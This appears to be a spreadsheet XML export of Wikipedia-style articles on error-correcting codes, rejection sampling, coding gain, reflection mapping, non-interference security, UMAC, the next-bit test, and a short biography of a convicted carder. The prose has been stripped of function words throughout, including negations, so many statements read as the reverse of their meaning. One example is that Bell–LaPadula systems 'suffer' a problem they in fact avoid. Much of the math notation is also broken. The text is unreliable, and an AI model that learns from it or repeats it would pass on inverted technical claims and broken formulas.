−ω(x1)/λ'(x1) −ω(x2)/λ'(x2) 122subtracting {\displaystyle e_{1}x^{3}+e_{2}x^{4}=74x^{3}+122x^{4}} received polynomial r(x) reproduces original codeword berlekamp–massey decoder berlekamp–massey algorithm alternate iterative procedure finding error locator polynomial. during iteration, calculates discrepancy based current instance λ(x) assumed number errors {\displaystyle \delta =s_{i}+\lambda _{1}\ s_{i-1}+\cdots +\lambda _{e}\ s_{i-e}} adjusts λ(x) recalculated would zero. article berlekamp–massey algorithm detailed description procedure. following example, c(x) used represent λ(x). example using data peterson gorenstein zierler example above: final value error locator polynomial, λ(x). euclidean decoder another iterative method calculating error locator polynomial error value polynomial based sugiyama's adaptation extended euclidean algorithm define s(x), λ(x), ω(x) syndromes errors: {\displaystyle s(x)=s_{t}x^{t-1}+s_{t-1}x^{t-2}+\cdots +s_{2}x+s_{1}} {\displaystyle \lambda (x)=\lambda _{e}x^{e}+\lambda _{e-1}x^{e-1}+\cdots +\lambda _{1}x+1} {\displaystyle \omega (x)=\omega _{e}x^{e}+\omega _{e-1}x^{e-1}+\cdots +\omega _{1}x+\omega _{0}} equation {\displaystyle \lambda (x)s(x)=q(x)x^{t}+\omega (x)} {\displaystyle {\begin{bmatrix}\lambda _{3}s_{6}&amp;x^{8}\\\lambda _{2}s_{6}+\lambda _{3}s_{5}&amp;x^{7}\\\lambda _{1}s_{6}+\lambda _{2}s_{5}+\lambda _{3}s_{4}&amp;x^{6}\\s_{6}+\lambda _{1}s_{5}+\lambda _{2}s_{4}+\lambda _{3}s_{3}&amp;x^{5}\\s_{5}+\lambda _{1}s_{4}+\lambda _{2}s_{3}+\lambda _{3}s_{2}&amp;x^{4}\\s_{4}+\lambda _{1}s_{3}+\lambda _{2}s_{2}+\lambda _{3}s_{1}&amp;x^{3}\\s_{3}+\lambda _{1}s_{2}+\lambda _{2}s_{1}&amp;x^{2}\\s_{2}+\lambda _{1}s_{1}&amp;x\\s_{1}\end{bmatrix}}={\begin{bmatrix}q_{2}x^{8}\\q_{1}x^{7}\\q_{0}x^{6}\\0\\0\\0\\\omega _{2}x^{2}\\\omega _{1}x\\\omega _{0}\end{bmatrix}}} middle terms zero relationship syndromes. extended euclidean algorithm find series polynomials form ai(x) s(x) bi(x) ri(x)where degree decreases increases. once degree ri(x) t/2, ai(x) λ(x) bi(x) −q(x) ri(x) ω(x). b(x) q(x) need saved, algorithm becomes: s(x) degree ri-2 ri-1 ri-2 ri-1 ai-2 ai-1to order term λ(x) divide λ(x) ω(x) ai(0): λ(x) ai(0) ω(x) ai(0)ai(0) constant (low order) term example using data peterson–gorenstein–zierler example above: λ(x) ω(x) decoder using discrete fourier transform discrete fourier transform used decoding. avoid conflict syndrome names, c(x) s(x) encoded codeword. r(x) e(x) above. define c(x), e(x), r(x) discrete fourier transforms c(x), e(x), r(x). since r(x) c(x) e(x), since discrete fourier transform linear operator, r(x) c(x) e(x). transform r(x) r(x) using discrete fourier transform. since calculation discrete fourier transform calculation syndromes, coefficients r(x) e(x) syndromes: {\displaystyle r_{j}=e_{j}=s_{j}=r(\alpha ^{j})} {\displaystyle {\text{for }}1\leq j\leq {\displaystyle r_{1}} {\displaystyle r_{t}} syndromes (they're same) generate error locator polynomial using methods decoders. number errors. generate e(x) using known coefficients {\displaystyle e_{1}} {\displaystyle e_{t}} error locator polynomial, formulas {\displaystyle e_{0}=-{\frac {1}{\lambda _{v}}}(e_{v}+\lambda _{1}e_{v-1}+\cdots +\lambda _{v-1}e_{1})} {\displaystyle e_{j}=-(\lambda _{1}e_{j-1}+\lambda _{2}e_{j-2}+\cdots +\lambda _{v}e_{j-v})} {\displaystyle {\text{for }}t&lt;j&lt;n} then calculate c(x) r(x) e(x) take inverse transform (polynomial interpolation) c(x) produce c(x). decoding beyond error-correction bound singleton bound states minimum distance linear block code size (n,k) upper-bounded distance usually understood limit error-correction capability ⌊(d-1) reed–solomon code achieves bound equality, thus correct ⌊(n-k) errors. however, error-correction bound exact. 1999, madhu sudan venkatesan guruswami published "improved decoding reed–solomon algebraic-geometry codes" introducing algorithm allowed correction errors beyond half minimum distance code. applies reed–solomon codes generally algebraic geometric codes. this algorithm produces list codewords list-decoding algorithm) based interpolation factorization polynomials {\displaystyle gf(2^{m})} extensions. soft-decoding algebraic decoding m</t>
  </si>
  <si>
    <t>Rejection sampling</t>
  </si>
  <si>
    <t>numerical analysis computational statistics, rejection sampling basic technique used generate observations distribution. also commonly called acceptance-rejection method "accept-reject algorithm" type exact simulation method. method works distribution {\displaystyle \mathbb ^{m}} density. rejection sampling based observation sample random variable dimension, perform uniformly random sampling two-dimensional cartesian graph, keep samples region graph density function. note property extended n-dimension functions. description visualize motivation behind rejection sampling, imagine graphing density function random variable onto large rectangular board throwing darts assume darts uniformly distributed around board. remove darts outside area curve. remaining darts distributed uniformly within area curve, x-positions darts distributed according random variable's density. this room darts land curve highest thus probability density greatest. visualization described equivalent particular form rejection sampling "proposal distribution" uniform (hence graph rectangle). general form rejection sampling assumes board necessarily rectangular shaped according density proposal distribution know sample (for example, using inversion sampling), least high every point distribution want sample from, former completely encloses latter. (otherwise, would parts curved area want sample could never reached.) rejection sampling works follows: sample point x-axis proposal distribution. draw vertical line x-position, maximum y-value probability density function proposal distribution. sample uniformly along line maximum probability density function. sampled value greater value desired distribution vertical line, reject x-value return step else x-value sample desired distribution.this algorithm used sample area curve, regardless whether function integrates fact, scaling function constant effect sampled x-positions. thus, algorithm used sample distribution whose normalizing constant unknown, common computational statistics. theory rejection sampling method generates sampling values target distribution {\displaystyle arbitrary probability density function {\displaystyle f(x)} using proposal distribution {\displaystyle probability density {\displaystyle g(x)} idea generate sample value {\displaystyle instead sampling {\displaystyle accepting sample {\displaystyle probability {\displaystyle f(x)/(mg(x))} repeating draws {\displaystyle value accepted. {\displaystyle constant, finite bound likelihood ratio {\displaystyle f(x)/g(x)} satisfying {\displaystyle 1&lt;m&lt;\infty support {\displaystyle words, must satisfy {\displaystyle f(x)\leq mg(x)} values {\displaystyle note requires support {\displaystyle must include support {\displaystyle words, {\displaystyle g(x)&gt;0} whenever {\displaystyle f(x)&gt;0} validation method envelope principle: simulating pair {\textstyle (x,v=u\cdot mg(x))} produces uniform simulation subgraph {\textstyle mg(x)} accepting pairs {\textstyle u&lt;f(x)/(mg(x))} produces pairs {\displaystyle (x,v)} uniformly distributed subgraph {\displaystyle f(x)} thus, marginally, simulation {\displaystyle f(x).} this means that, enough replicates, algorithm generates sample desired distribution {\displaystyle f(x)} there number extensions algorithm, metropolis algorithm. this method relates general field monte carlo techniques, including markov chain monte carlo algorithms also proxy distribution achieve simulation target distribution {\displaystyle f(x)} forms basis algorithms metropolis algorithm. unconditional acceptance probability proportion proposed samples accepted, {\displaystyle u\sim \mathrm {unif} (0,1)} value {\displaystyle time generated density function {\displaystyle g(\cdot proposal distribution {\displaystyle number samples required {\displaystyle obtain accepted value thus follows geometric distribution probability {\displaystyle 1/m} mean {\displaystyle intuitively, {\displaystyle expected number iterations needed, measure computational complexity algorithm. rewrite equation, note {\textstyle 1\leq m&lt;\infty formula, {\textstyle \mathbb \left(u\leq {\frac {f(y)}{mg(y)}}\right)} probability take values interval {\displaystyle [0,1]} when {\displaystyle chosen closer one, unconditional acceptance probability higher less ratio varies, since {\displaystyle upper bound likelihood ratio {\textstyle f(x)/g(x)} practice, value {\displaystyle closer preferred implies fewer rejected samples, average, thus fewer iterations algorithm. sense, prefers {\displaystyle small possible (while still satisfying {\displaystyle f(x)\leq mg(x)} suggests {\displaystyle g(x)} generally resemble {\displaystyle f(x)} way. note, however, {\displaystyle cannot equal would imply {\displaystyle f(x)=g(x)} i.e. target proposal distributions actually distribution. rejection sampling often used cases form {\displaystyle f(x)} makes sampling difficult. single iteration rejection algorithm requires sampling proposal distribution, drawing uniform distribution, evaluating {\displaystyle f(x)/(mg(x))} expression. rejection sampling thus efficient method whenever times cost operations—which expected cost obtaining sample rejection sampling—is lower cost obtaining sample using method. algorithm algorithm (used john neumann dating back buffon needle) obtain sample distribution {\displaystyle density {\displaystyle using samples distribution {\displaystyle density {\displaystyle follows: obtain sample {\displaystyle distribution {\displaystyle sample {\displaystyle {\displaystyle \mathrm {unif} (0,1)} (the uniform distribution unit interval). check whether {\textstyle u&lt;f(y)/mg(y)} holds, accept {\displaystyle sample drawn {\displaystyle not, reject value {\displaystyle return sampling step.the algorithm take average {\displaystyle iterations obtain sample. advantages sampling using naive methods rejection sampling efficient compared naive methods situations. example, given problem sampling {\textstyle x\sim f(\cdot conditionally {\displaystyle given {\displaystyle i.e., {\textstyle x|x\in sometimes {\textstyle easily simulated, using naive methods (e.g. inverse transform sampling): sample {\textstyle x\sim f(\cdot independently, leave satisfying {\displaystyle \{n\geq 1:x_{n}\in a\}} output: {\displaystyle \{x_{1},x_{2},...,x_{n}:x_{i}\in a,i=1,...,n\}} problem sampling difficult inefficient, {\textstyle \mathbb (x\in a)\approx expected number iterations would {\displaystyle {\frac {1}{\mathbb (x\in a)}}} could close infinity. moreover, even apply rejection sampling method, always hard optimize bound {\displaystyle likelihood ratio. more often not, {\displaystyle large rejection rate high, algorithm inefficient. natural exponential family exists), also known exponential tilting, provides class proposal distributions lower computation complexity, value {\displaystyle speed computations (see examples: working natural exponential families). examples: working natural exponential families given random variable {\displaystyle x\sim f(\cdot {\displaystyle f(x)=\mathbb (x\leq target distribution. assume simplicity, density function explicitly written {\displaystyle f(x)} choose proposal {\displaystyle \psi (\theta )=\log \left(\mathbb \exp(\theta x)\right)} {\displaystyle \theta =\{\theta :\psi (\theta )&lt;\infty clearly, {\displaystyle \{f_{\theta }(\cdot )\}_{\theta \theta natural exponential family. moreover, likelihood ratio note {\displaystyle \psi (\theta )&lt;\infty implies indeed moment-generation function, {\displaystyle \psi (\theta )=\log \mathbb {\exp(tx)}|_{t=\theta }=\log m_{x}(t)|_{t=\theta easy derive moment-generation function proposal therefore proposal's moments. simple example, suppose {\displaystyle f(\cdot {\displaystyle x\sim \mathrm (\mu ,\sigma ^{2})} {\textstyle \psi (\theta )=\theta +{\frac {\sigma ^{2}\theta ^{2}}{2}}} goal sample {\displaystyle x|x\in \left[b,\infty \right]} {\displaystyle b&gt;\mu analysis goes follows. choose form proposal distribution {\displaystyle f_{\theta }(\cdot moment-generating function {\textstyle \psi _{\theta }(\eta )=\psi (\theta +\eta )-\psi (\eta )=\eta (\mu +\theta \sigma ^{2})+{\frac {\sigma ^{2}\eta ^{2}}{2}}} implies normal distribution {\displaystyle \mathrm (\mu +\theta \sigma ^{2},\sigma ^{2})} decide well chosen {\displaystyle \theta ^{*}} proposal distribution. setup, intuitive choose {\displaystyle \theta ^{*}} {\displaystyle \mathbb _{\theta }(x)=\mu +\theta \sigma ^{2}=b} {\displaystyle \theta ^{*}={\frac {b-\mu }{\sigma ^{2}}}} explicitly write target, proposal likelihood ratio derive bound {\displaystyle likelihood ratio {\displaystyle z(x)} decreasing function {\displaystyle x\in [b,\infty therefore rejection sampling criterion: {\displaystyle u\sim \mathrm {unif} (0,1)} holds, accept value {\displaystyle not, continue sampling {\textstyle x\sim _{i.i.d.}\mathrm (\mu +\theta ^{*}\sigma ^{2},\sigma ^{2})} {\textstyle u\sim \mathrm {unif} (0,1)} acceptance.for example, measurement efficiency, expected number iterations nef-based rejection sampling method order {\displaystyle m(b)=o(b)} naive method, expected number iterations {\textstyle {\frac {1}{\mathbb (x\geq b)}}=o(b\cdot e^{\frac {(b-\mu )^{2}}{2\sigma ^{2}}})} inefficient. general, exponential tilting, parametric class proposal distribution, solves optimization problems conveniently, useful properties directly characterize distribution proposal. type problem, simulate {\displaystyle conditionally {\displaystyle x\in among class simple distributions, trick nefs, helps gain control complexity considerably speed computation. indeed, deep mathematical reasons using nefs. drawbacks rejection sampling lead unwanted samples taken function sampled highly concentrated certain region, example function spike location. many distributions, problem solved using adaptive extension (see adaptive rejection sampling), appropriate change variables method ratio uniforms. addition, dimensions problem larger, ratio embedded volume "corners" embedding volume tends towards zero, thus rejections take place useful sample generated, thus making algorithm inefficient impractical. curse dimensionality. high dimensions, necessary different approach, typically markov chain monte carlo method metropolis sampling gibbs sampling. (however, gibbs sampling, breaks multi-dimensional sampling problem series low-dimensional samples, rejection sampling steps.) adaptive rejection sampling many distributions, finding proposal distribution includes given distribution without wasted space difficult. extension rejection sampling used overcome difficulty efficiently sample wide variety distributions (provided log-concave density functions, fact case common distributions—even whose density functions concave themselves) known adaptive rejection sampling (ars). there three basic ideas technique ultimately introduced gilks 1992: helps, define envelope distribution space (e.g. log-probability log-density) instead. that work {\displaystyle h\left(x\right)=\log g\left(x\right)} instead {\displaystyle g\left(x\right)} directly. often, distributions algebraically messy density functions reasonably simpler density functions (i.e. {\displaystyle f\left(x\right)} messy, {\displaystyle \log f\left(x\right)} easier work least, closer piecewise linear). instead single uniform envelope density function, piecewise linear density function envelope instead. each time reject sample, value {\displaystyle f\left(x\right)} evaluated, improve piecewise approximation {\displaystyle h\left(x\right)} this therefore reduces chance next attempt rejected. asymptotically, probability needing reject sample converge zero, practice, often rapidly. proposed, time choose point rejected, tighten envelope another line segment tangent curve point x-coordinate chosen point. piecewise linear model proposal distribution results piecewise exponential distributions (i.e. segments exponential distributions, attached end). exponential distributions well behaved well understood. logarithm exponential distribution straight line, hence method essentially involves enclosing logarithm density series line segments. this source log-concave restriction: distribution log-concave, logarithm concave (shaped like upside-down meaning line segment tangent curve always pass curve. working space, piecewise linear density function also sampled triangle distributions take even advantage (log) concavity requirement, potentially avoid cost evaluating {\displaystyle f\left(x\right)} sample accepted. just like construct piecewise linear upper bound (the "envelope" function) using values {\displaystyle h\left(x\right)} evaluate current chain rejections, also construct piecewise linear lower bound (the "squeezing" function) using values well. before evaluating (the potentially expensive) {\displaystyle f\left(x\right)} sample accepted, already know accepted comparing (ideally cheaper) {\displaystyle g_{l}\left(x\right)} {\displaystyle h_{l}\left(x\right)} case) squeezing function available. this squeezing step optional, even suggested gilks. best saves extra evaluation (messy and/or expensive) target density. however, presumably particularly expensive density functions (and assuming rapid convergence rejection rate toward zero) make sizable difference ultimate runtime.the method essentially involves successively determining envelope straight-line segments approximates logarithm better better still remaining curve, starting fixed number segments (possibly single tangent line). sampling truncated exponential random variable straightforward. just take uniform random variable (with appropriate interval corresponding truncation). unfortunately, applied sampling log-concave target densities. reason, several extensions proposed literature tackling non-log-concave target distributions. furthermore, different combinations metropolis-hastings method designed order obtain universal sampler builds self-tuning proposal densities (i.e., proposal automatically constructed adapted target). this class methods often called adaptive rejection metropolis sampling (arms) algorithms. resulting adaptive techniques always applied generated samples correlated case (although correlation vanishes quickly zero number iterations grows). also inverse transform sampling ratio uniforms pseudo-random number sampling ziggurat algorithm references robert, c.p. casella, "monte carlo statistical methods" (second edition). york: springer-verlag, 2004. neumann, "various techniques used connection random digits. monte carlo methods", nat. bureau standards, (1951), 36–38.</t>
  </si>
  <si>
    <t>Coding gain</t>
  </si>
  <si>
    <t>coding theory related engineering problems, coding gain measure difference signal-to-noise ratio (snr) levels uncoded system coded system required reach error rate (ber) levels used error correcting code (ecc). example uncoded bpsk system awgn environment error rate (ber) 10−2 level corresponding coded (e.g., bch) system coding gain code used case bch). power-limited regime power-limited regime (where nominal spectral efficiency {\displaystyle \rho \leq [b/2d b/s/hz], i.e. domain binary signaling), effective coding gain {\displaystyle \gamma _{\mathrm {eff} }(a)} signal {\displaystyle given target error probability {\displaystyle p_{b}(e)} defined difference {\displaystyle e_{b}/n_{0}} required achieve target {\displaystyle p_{b}(e)} {\displaystyle {\displaystyle e_{b}/n_{0}} required achieve target {\displaystyle p_{b}(e)} 2-pam (2×2)-qam (i.e. coding). nominal coding gain {\displaystyle \gamma _{c}(a)} defined {\displaystyle \gamma _{c}(a)={\frac {d_{\min }^{2}(a)}{4e_{b}}}.} this definition normalized {\displaystyle \gamma _{c}(a)=1} 2-pam (2×2)-qam. average number nearest neighbors transmitted {\displaystyle k_{b}(a)} equal one, effective coding gain {\displaystyle \gamma _{\mathrm {eff} }(a)} approximately equal nominal coding gain {\displaystyle \gamma _{c}(a)} however, {\displaystyle k_{b}(a)&gt;1} effective coding gain {\displaystyle \gamma _{\mathrm {eff} }(a)} less nominal coding gain {\displaystyle \gamma _{c}(a)} amount depends steepness {\displaystyle p_{b}(e)} {\displaystyle e_{b}/n_{0}} curve target {\displaystyle p_{b}(e)} this curve plotted using union bound estimate (ube) {\displaystyle p_{b}(e)\approx k_{b}(a)q\left({\sqrt {\frac {2\gamma _{c}(a)e_{b}}{n_{0}}}}\right),} gaussian probability-of-error function. special case binary linear block code {\displaystyle parameters {\displaystyle (n,k,d)} nominal spectral efficiency {\displaystyle \rho =2k/n} nominal coding gain kd/n. example table lists nominal spectral efficiency, nominal coding gain effective coding gain {\displaystyle p_{b}(e)\approx 10^{-5}} reed–muller codes length {\displaystyle n\leq bandwidth-limited regime bandwidth-limited regime {\displaystyle \rho &gt;2~b/2d} i.e. domain non-binary signaling), effective coding gain {\displaystyle \gamma _{\mathrm {eff} }(a)} signal {\displaystyle given target error rate {\displaystyle p_{s}(e)} defined difference {\displaystyle snr_{\mathrm {norm} required achieve target {\displaystyle p_{s}(e)} {\displaystyle {\displaystyle snr_{\mathrm {norm} required achieve target {\displaystyle p_{s}(e)} m-pam (m×m)-qam (i.e. coding). nominal coding gain {\displaystyle \gamma _{c}(a)} defined {\displaystyle \gamma _{c}(a)={(2^{\rho }-1)d_{\min }^{2}(a) \over 6e_{s}}.} this definition normalized {\displaystyle \gamma _{c}(a)=1} m-pam (m×m)-qam. becomes {\displaystyle p_{s}(e)\approx k_{s}(a)q{\sqrt {3\gamma _{c}(a)snr_{\mathrm {norm} }}},} {\displaystyle k_{s}(a)} average number nearest neighbors dimensions. also channel capacity eb/n0 references opencourseware, 6.451 principles digital communication lecture notes sections 5.3, 5.5, 6.3,</t>
  </si>
  <si>
    <t>Reflection mapping</t>
  </si>
  <si>
    <t>computer graphics, environment mapping, reflection mapping, efficient image-based lighting technique approximating appearance reflective surface means precomputed texture. texture used store image distant environment surrounding rendered object. several ways storing surrounding environment employed. first technique sphere mapping, single texture contains image surroundings reflected spherical mirror. almost entirely surpassed cube mapping, environment projected onto faces cube stored square textures unfolded square regions single texture. other projections superior mathematical computational properties include paraboloid mapping, pyramid mapping, octahedron mapping, healpix mapping. reflection mapping several approaches reflection rendering, alongside e.g. screen space reflections tracing computes exact reflection tracing light following optical path. reflection color used shading computation pixel determined calculating reflection vector point object mapping texel environment map. this technique often produces results superficially similar generated raytracing, less computationally expensive since radiance value reflection comes calculating angles incidence reflection, followed texture lookup, rather followed tracing scene geometry computing radiance ray, simplifying workload. however, circumstances mapped reflection approximation real reflection. environment mapping relies assumptions seldom satisfied: radiance incident upon object shaded comes infinite distance. when case reflection nearby geometry appears wrong place reflected object. when case, parallax seen reflection. object shaded convex, contains self-interreflections. when case object appear reflection; environment does.environment mapping generally fastest method rendering reflective surface. increase speed rendering, renderer calculate position reflected vertex. then, position interpolated across polygons vertex attached. this eliminates need recalculating every pixel's reflection direction. normal mapping used, polygon many face normals (the direction given point polygon facing), used tandem environment produce realistic reflection. case, angle reflection given point polygon take normal consideration. this technique used make otherwise flat surface appear textured, example corrugated metal, brushed aluminium. types sphere mapping sphere mapping represents sphere incident illumination though seen reflection reflective sphere orthographic camera. texture image created approximating ideal setup, using fisheye lens prerendering scene spherical mapping. spherical mapping suffers limitations detract realism resulting renderings. because spherical maps stored azimuthal projections environments represent, abrupt point singularity "black hole" effect) visible reflection object texel colors near edge distorted inadequate resolution represent points accurately. spherical mapping also wastes pixels square sphere. artifacts spherical mapping severe effective viewpoints near virtual orthographic camera. cube mapping cube mapping polyhedron mappings address severe distortion sphere maps. cube maps made filtered correctly, visible seams, used independent viewpoint often-virtual camera acquiring map. cube polyhedron maps since superseded sphere maps computer graphics applications, exception acquiring image-based lighting. image-based lighting done parallax-corrected cube maps.generally, cube mapping uses skybox used outdoor renderings. cube-mapped reflection done determining vector object viewed this camera reflected surface normal camera vector intersects object. this results reflected passed cube texel provides radiance value used lighting calculation. this creates effect object reflective. healpix mapping healpix environment mapping similar polyhedron mappings, hierarchical, thus providing unified framework generating polyhedra better approximate sphere. this allows lower distortion cost increased computation. history precursor work texture mapping established edwin catmull, refinements curved surfaces james blinn, 1974. blinn went refine work, developing environment mapping 1976.gene miller experimented spherical environment mapping 1982 magi synthavision. wolfgang heidrich introduced paraboloid mapping 1998.emil praun introduced octahedron mapping 2003.mauro steigleder introduced pyramid mapping 2005.tien-tsin wong, introduced existing healpix mapping rendering 2006. also skybox (video games) references external links story reflection mapping paul debevec nvidia's paper cube environment mapping approximation reflective transparent objects environmental maps</t>
  </si>
  <si>
    <t>Non-interference (security)</t>
  </si>
  <si>
    <t>noninterference strict multilevel security policy model, first described goguen meseguer 1982, amplified 1984. introduction simple terms, computer modeled machine inputs outputs. inputs outputs classified either (low sensitivity, highly classified) high (sensitive, viewed uncleared individuals). computer noninterference property sequence inputs produce outputs, regardless high level inputs are. that (uncleared) user working machine, respond exactly manner outputs) whether high (cleared) user working sensitive data. user able acquire information activities any) high user. formal expression {\displaystyle memory configuration, {\displaystyle m_{\text{l}}} {\displaystyle m_{h}} projection memory {\displaystyle high parts, respectively. {\displaystyle {=_{\text{l}}}} function compares parts memory configurations, i.e., {\displaystyle {=_{\text{l}}}\ m^{\prime {\displaystyle m_{\text{l}}=m_{\text{l}}^{\prime {\displaystyle (p,m)\rightarrow ^{*}m^{\prime execution program {\displaystyle starting memory configuration {\displaystyle terminating memory configuration {\displaystyle m^{\prime definition noninterference deterministic program {\displaystyle following: {\displaystyle {\begin{array}{rrl}\forall m_{1},m_{2}:\;&amp;m_{1}\ {=_{\text{l}}}\ m_{2}&amp;\land \\&amp;(p,m_{1})\rightarrow ^{*}m_{1}^{\prime }&amp;\land \\&amp;(p,m_{2})\rightarrow ^{*}m_{2}^{\prime }&amp;\rightarrow \\&amp;m_{1}^{\prime {=_{\text{l}}}\ m_{2}^{\prime }\end{array}}} limitations strictness this strict policy, computer system covert channels comply with, say, bell–lapadula model, comply noninterference. reverse could true (under reasonable conditions, system labelled files, etc.) except classified information startup" exceptions noted below. however, noninterference shown stronger nondeducibility. this strictness comes price. difficult make computer system property. there commercially available products verified comply policy, would essentially simple switches one-way information filters (although could arranged provide useful behaviour). classified information startup computer time high (i.e., classified) information within users create high information subsequent time=0 (so-called "write-up", allowed many computer security policies), computer legally leak high information user, still said comply noninterference policy. user able learn anything high user activities, learn high information created means actions high users. (von oheimb 2004) computer systems comply bell–lapadula model suffer problem since explicitly forbid "read-up". consequently, computer system complies noninterference necessarily comply bell–lapadula model. thus, bell–lapadula model noninterference model incomparable: bell–lapadula model stricter regarding read-up, noninterference model stricter respect covert channels. summarisation some legitimate multilevel security activities treat individual data records (e.g., personal details) sensitive, allow statistical functions data (e.g., mean, total number) released widely. this cannot achieved noninterference machine. generalizations noninterference property requires system reveal information high inputs observable output various inputs. however, argue achieving noninterference oftentimes possible large class practical systems, moreover, desirable: programs need reveal information depends secret inputs, e.g. output must different user enters correct credential enters incorrect credentials. shannon entropy, guessing entropy, min-entropy prevalent notions quantitative information leakage generalize noninterference. references further reading mclean, john (1994). "security models". encyclopedia software engineering. vol. york: john wiley sons, inc. 1136–1145.von oheimb, david (2004). "information flow control revisited: noninfluence noninterference nonleakage". european symposium research computer security (esorics). sophia antipolis, france: lncs, springer-verlag. 225–243.</t>
  </si>
  <si>
    <t>UMAC</t>
  </si>
  <si>
    <t>cryptography, message authentication code based universal hashing, umac, type message authentication code (mac) calculated choosing hash function class hash functions according secret (random) process applying message. resulting digest fingerprint encrypted hide identity hash function used. mac, used simultaneously verify data integrity authenticity message. specific type umac, also commonly referred umac, specified 4418, provable cryptographic strength usually less computationally intensive macs. umac's design optimized 32-bit architectures simd support, performance cycle byte (cpb) simd without simd. closely related variant umac optimized 64-bit architectures given vmac, submitted ietf draft (draft-krovetz-vmac-01) never gathered enough attention becoming standardized rfc. background universal hashing let's hash function chosen class hash functions maps messages possible message digests. this class called universal distinct pair messages, |h|/|d| functions member this means attacker wants replace message another and, point view hash function chosen completely randomly, probability umac detect modification 1/|d|. definition strong enough possible messages d={0,1} consists identity operation not, universal. even digest encrypted modular addition, attacker change message digest time receiver know difference. strongly universal hashing class hash functions good make difficult attacker guess correct digest fake message intercepting message digest words, {\displaystyle _{h\in h}[h(f)=d|h(a)=c]\,} needs small, preferably 1/|d|. easy construct class hash functions field. example, prime, operations taken modulo |d|. message encoded n-dimensional vector (a1, ..., an). |d|n+1 members, corresponding 1)-dimensional vector (h0, ..., hn). {\displaystyle h(a)=h_{0}+\sum _{i=1}^{n}h_{i}a_{i}\,} rules probabilities combinatorics prove {\displaystyle _{h\in h}[h(f)=d|h(a)=c]={1 \over |d|}} properly encrypt digests (e.g. one-time pad), attacker cannot learn anything hash function used communication parties. this true encryption quite likely messages produce hash value. then kind initialization vector used, often called nonce. become common practice f(nonce), also secret. notice massive amounts computer power help attacker all. recipient limits amount forgeries accepts sleeping whenever detects one), smaller. example following function generates umac. assumes secret multiple bits, longer secret result already contains secret bits e.g. f(nonce). nonce need contained msg. umac functions unnamed strongly universal hash-function family uses multiplies compute hash value. family halves number multiplications, roughly translates two-fold speed-up practice. speed, umac uses hash-function family. specifically designed simd instructions, hence umac first function optimized simd.the following hash family {\displaystyle 2^{-w}} -universal: {\displaystyle \operatorname {nh} _{k}(m)=\left(\sum _{i=0}^{(n/2)-1}((m_{2i}+k_{2i}){\bmod {~}}2^{w})\cdot ((m_{2i+1}+k_{2i+1}){\bmod {~}}2^{w})\right){\bmod {~}}2^{2w}} .where message encoded n-dimensional vector w-bit words (m0, ..., mn-1). intermediate encoded n+1-dimensional vector w-bit words (k0, ..., kn). pseudorandom generator generates shared secret key.practically, done unsigned integers. multiplications 2^w, additions 2^w/2, inputs vector half-words {\displaystyle w/2=32} -bit integers). algorithm {\displaystyle \lceil k/2\rceil multiplications, {\displaystyle number half-words vector. thus, algorithm runs "rate" multiplication word input. 4418 4418 wrap make good umac. overall uhash ("universal hash function") routine produces variable length tags, corresponds number iterations (and total lengths keys) needed three layers hashing. several calls aes-based derivation function used provide keys three keyed hashes. layer (1024 byte chunks byte hashes concatenated) uses fast. layer hashes everything bytes using poly function performs prime modulus arithmetics, prime changing size input grows. layer hashes 16-byte string fixed length bytes. this iteration generates.in 4418, rearranged take form +_64 ((m_{i+0} +_32 k_{i+0}) *_64 (m_{i+4} +_32 k_{i+4})) +_64 ((m_{i+1} +_32 k_{i+1}) *_64 (m_{i+5} +_32 k_{i+5})) +_64 ((m_{i+2} +_32 k_{i+2}) *_64 (m_{i+6} +_32 k_{i+6})) +_64 ((m_{i+3} +_32 k_{i+3}) *_64 (m_{i+7} +_32 k_{i+7})) this definition designed encourage programmers simd instructions accumulation, since data four indices away likely simd register, hence faster multiply bulk. hypothetical machine, could simply translate also poly1305 another fast based strongly universal hashing. references external links krovetz. "umac: fast provably secure message authentication"."the umac transport layer protocol: draft-miller-secsh-umac-01.txt". ietf. 2007-09-03.</t>
  </si>
  <si>
    <t>Sergey Pavlovich</t>
  </si>
  <si>
    <t>sergey alexandrovich pavlovich (also known police dog, panther[757], fallen angel, diplomaticos) famous carders territory former soviet union. biography born february 1983 vyazye, village mogilev region belarus. 2000 finished school minsk. 2000–2003 studying faculty journalism belorussian state university. 2004–2009 brought trial three times account cyber crimes. total sentence amounted years jail. while jail, sergey wrote published book: steal million: memoirs russian hackerin convinced young follow criminal steps. honorarium book author donated children's oncologic clinic borovlyany (belarus). criminal activities sergey started criminal career contributing russia's largest carding forum carderplanet.among sergey's friends e.f.g. partners crime people badb (vladislav khorokhorin), fidel (sergey storchak), maksik (maksim yastremskiy), jonnyhell (alexander suvorov) chinese triad boss michael cheung others. 2008 sergey appeared among people charged "the largest personal data theft history usa". associate famous hacker albert gonzalez.currently entrepreneur businesses internet), author popular youtube channels "people pro" "mother russia", acts speaker cybersecurity promotion youtube. references</t>
  </si>
  <si>
    <t>Next-bit test</t>
  </si>
  <si>
    <t>cryptography theory computation, next-bit test test pseudo-random number generators. sequence bits passes next test position {\displaystyle sequence, attacker knows {\displaystyle first bits (but seed) cannot predict {\displaystyle (i+1)} reasonable computational power. precise statement(s) {\displaystyle polynomial, {\displaystyle s=\{s_{k}\}} collection sets {\displaystyle s_{k}} contains {\displaystyle p(k)} -bit long sequences. moreover, {\displaystyle _{k}} probability distribution strings {\displaystyle s_{k}} define next-bit test different ways. boolean circuit formulation predicting collection {\displaystyle c=\{c_{k}^{i}\}} collection boolean circuits, circuit {\displaystyle c_{k}^{i}} less {\displaystyle p_{c}(k)} gates exactly {\displaystyle inputs. {\displaystyle p_{k,i}^{c}} probability that, input {\displaystyle first bits {\displaystyle string randomly selected {\displaystyle s_{k}} probability {\displaystyle _{k}(s)} circuit correctly predicts {\displaystyle s_{i+1}} i.e. now, {\displaystyle \{s_{k}\}_{k}} passes next-bit test predicting collection {\displaystyle polynomial {\displaystyle probabilistic turing machines also define next-bit test terms probabilistic turing machines, although definition somewhat stronger (see adleman's theorem). {\displaystyle {\mathcal {m}}} probabilistic turing machine, working polynomial time. {\displaystyle p_{k,i}^{\mathcal {m}}} probability {\displaystyle {\mathcal {m}}} predicts {\displaystyle (i+1)} correctly, i.e. collection {\displaystyle s=\{s_{k}\}} passes next-bit test polynomial {\displaystyle finitely many {\displaystyle {\displaystyle 0&lt;i&lt;k} completeness yao's test next-bit test particular case yao's test random sequences, passing therefore necessary condition passing yao's test. however, also shown sufficient condition yao.we prove case probabilistic turing machine, since adleman already done work replacing randomization non-uniformity theorem. case boolean circuits cannot derived case (since involves deciding potentially undecidable problems), proof adleman's theorem easily adapted case non-uniform boolean circuit 